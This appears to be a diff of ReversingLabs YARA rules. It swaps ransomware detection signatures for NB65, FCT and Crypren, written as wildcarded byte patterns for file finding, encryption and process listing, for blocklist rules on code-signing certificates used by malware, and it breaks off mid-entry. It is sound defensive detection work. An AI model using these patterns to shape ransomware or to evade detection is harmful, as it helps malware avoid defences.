?? C6 45 ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? - ?? ?? ?? 39 9D ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? - ?? ?? 0F 43 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 8D 8D ?? - ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? - C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 - } - $encrypt_files_p3 = { - 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? - ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? - E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 04 ?? 88 45 ?? FF 75 ?? E8 ?? ?? ?? - ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 2C ?? 88 45 ?? FF 75 - ?? E8 ?? ?? ?? ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 - } - $encrypt_files_p4 = { - 85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? BE ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 56 50 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? - ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D - ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? - C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 - ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? - 59 59 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? - ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? - ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8D - } - $encrypt_files_p5 = { - 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? - ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 50 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D - } - $encrypt_files_p6 = { - E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? 83 - EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? - ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? - ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 95 ?? - ?? ?? ?? 03 CA 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 2B C8 51 50 56 E8 ?? ?? ?? - ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? - 68 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Funbit" and pe.signatures[i].serial=="7c:ad:9c:37:f7:af:fa:8f:4d:82:29:f9:76:07:e2:65" and 1122508800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_NB65 : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE { meta: - description = "Yara rule that detects NB65 ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1aba009e-8065-5fb0-98e7-a595cb324076" - date = "2022-06-01" - modified = "2022-06-01" + id = "4604f1a6-2fdb-5917-943d-f0e2dbaaa29e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.NB65.yara#L1-L68" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f8a0e265fc72a9f017b37ce4b6dbb878285a5d298ab1b8c69f9fde7159426981" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14112-L14128" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5e203f87dd4608ba5d583e02ce86fbe230e45fff86a7a697766e149d0cf6f436" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "NB65" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? - C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? - C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? - C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? - C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ?? - 0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ?? - 8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50 - ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0 - 85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? - 8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ?? - ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 - } - $find_files = { - 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 - 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? - 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? - 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? - ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? - 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $enum_procs = { - 33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D - 42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B - 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 - ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ?? - ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 - 0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 - E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ?? - ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ELECTRONIC GROUP" and pe.signatures[i].serial=="09:8a:57" and 1032855179<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "973aaf33-25a2-5f40-a5a7-d9f77e3589b3" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14130-L14146" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d25d998c980f47f4da065155451503dcbc677ad041af85a6ed7060ecadec66b3" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($enum_procs) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Joerm.com" and pe.signatures[i].serial=="53:89:cc:62:86:da:3b:fa:1d:c4:df:49:8b:f6:83:61" and 1495497600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_FCT : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE { meta: - description = "Yara rule that detects FCT ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ea3d5514-d6f2-5fd0-9247-a3f6b920d8d9" - date = "2020-07-15" - modified = "2020-07-15" + id = "1eeff730-c2ce-5689-a8cb-455618738a82" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.FCT.yara#L1-L86" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b158ad56c92a926f7398a27b3576c259e39c9716ef192fa5944ce3cffdc6d7d0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14148-L14166" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "02cfdf883212387a465af3e692b29b8d0eb8249e0a260f18bec2f662d775b606" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "FCT" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? - ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 DB 8B 55 ?? 33 C9 8B 75 - ?? 89 9D ?? ?? ?? ?? 85 D2 74 ?? 66 90 83 7D ?? ?? 8D 45 ?? 0F 43 C6 0F BE 04 08 41 - 03 D8 3B CA 72 ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? - ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B CF C7 45 ?? ?? ?? ?? ?? 33 C0 - C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 - F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? - 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 - D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 - } - $find_files_p2 = { - 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 - ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? - 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 55 ?? 8D 48 ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 52 - ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 - FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 - C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D - ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8 - } - $encrypt_files_p1 = { - 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? - ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? - C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 8B 5D ?? 2B CA 8B 55 ?? 8B C3 D1 F9 2B - C2 3B C8 77 ?? 83 FB ?? 8D 04 09 50 8D 75 ?? 0F 43 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 3C - 0A 89 7D ?? 8D 04 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 8D 85 ?? - ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 81 BD - ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F - 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F2 85 F6 74 - } - $encrypt_files_p2 = { - 6A ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 2B C6 56 03 C1 50 57 FF 15 ?? ?? ?? ?? 2B 75 ?? 74 - ?? 8B 8D ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 9D ?? ?? ?? ?? - BA ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 CB ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 89 95 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8D 48 ?? 3B CA 76 ?? C6 85 ?? ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 95 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 3B C2 77 ?? 8D 34 00 89 85 ?? - ?? ?? ?? 83 FA ?? 8D BD ?? ?? ?? ?? 56 0F 43 BD ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 - C4 ?? 33 C0 66 89 04 37 EB ?? 50 51 C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? - 72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 6A ?? 0F 43 B5 ?? ?? ?? ?? 8D 79 ?? 68 ?? ?? ?? ?? - 89 BD ?? ?? ?? ?? 8D 04 4E 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 6A ?? - 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 8D ?? ?? ?? ?? 83 7D - ?? ?? 51 0F 43 45 ?? 50 FF 15 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\xA4\\xA9\\xE6\\xB8\\xB8\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:ed:9c:ae:b7:91:1b:31:bd" or pe.signatures[i].serial=="ed:9c:ae:b7:91:1b:31:bd") and 1506001740<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "125c0b95-82bb-5900-8e8c-4359b8cd18ab" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14168-L14184" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6b5cc47f4df9e57c59bc66c32188e02390d4855a1b9e56bd7471fd641a245c3c" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BEAR AND CILLA LTD" and pe.signatures[i].serial=="0f:d2:b1:9a:94:1b:70:09:cc:72:8a:37:cb:1b:10:b9" and 1560470400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Crypren : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE { meta: - description = "Yara rule that detects Crypren ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9a6ff190-b26b-5b75-9103-95a3b2e80701" - date = "2020-07-15" - modified = "2020-07-15" + id = "0e844bef-1cfe-5eba-af4d-d8477e55470c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Crypren.yara#L1-L144" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = 